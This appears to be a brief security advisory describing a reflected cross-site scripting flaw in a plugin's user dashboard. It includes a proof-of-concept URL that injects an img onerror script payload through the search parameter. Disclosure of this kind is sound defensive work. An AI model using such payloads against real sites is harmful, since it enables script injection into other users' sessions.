The plugin does not sanitise and escape various parameters before outputting them back in some pages such as the user dashboard, leading to a Reflected Cross-Site Scripting
Open the following URL when authenticated (as any user): https://example.com/user-dashboard/?search=keyword:<img%20src=1%20onerror=alert(/XSS/)>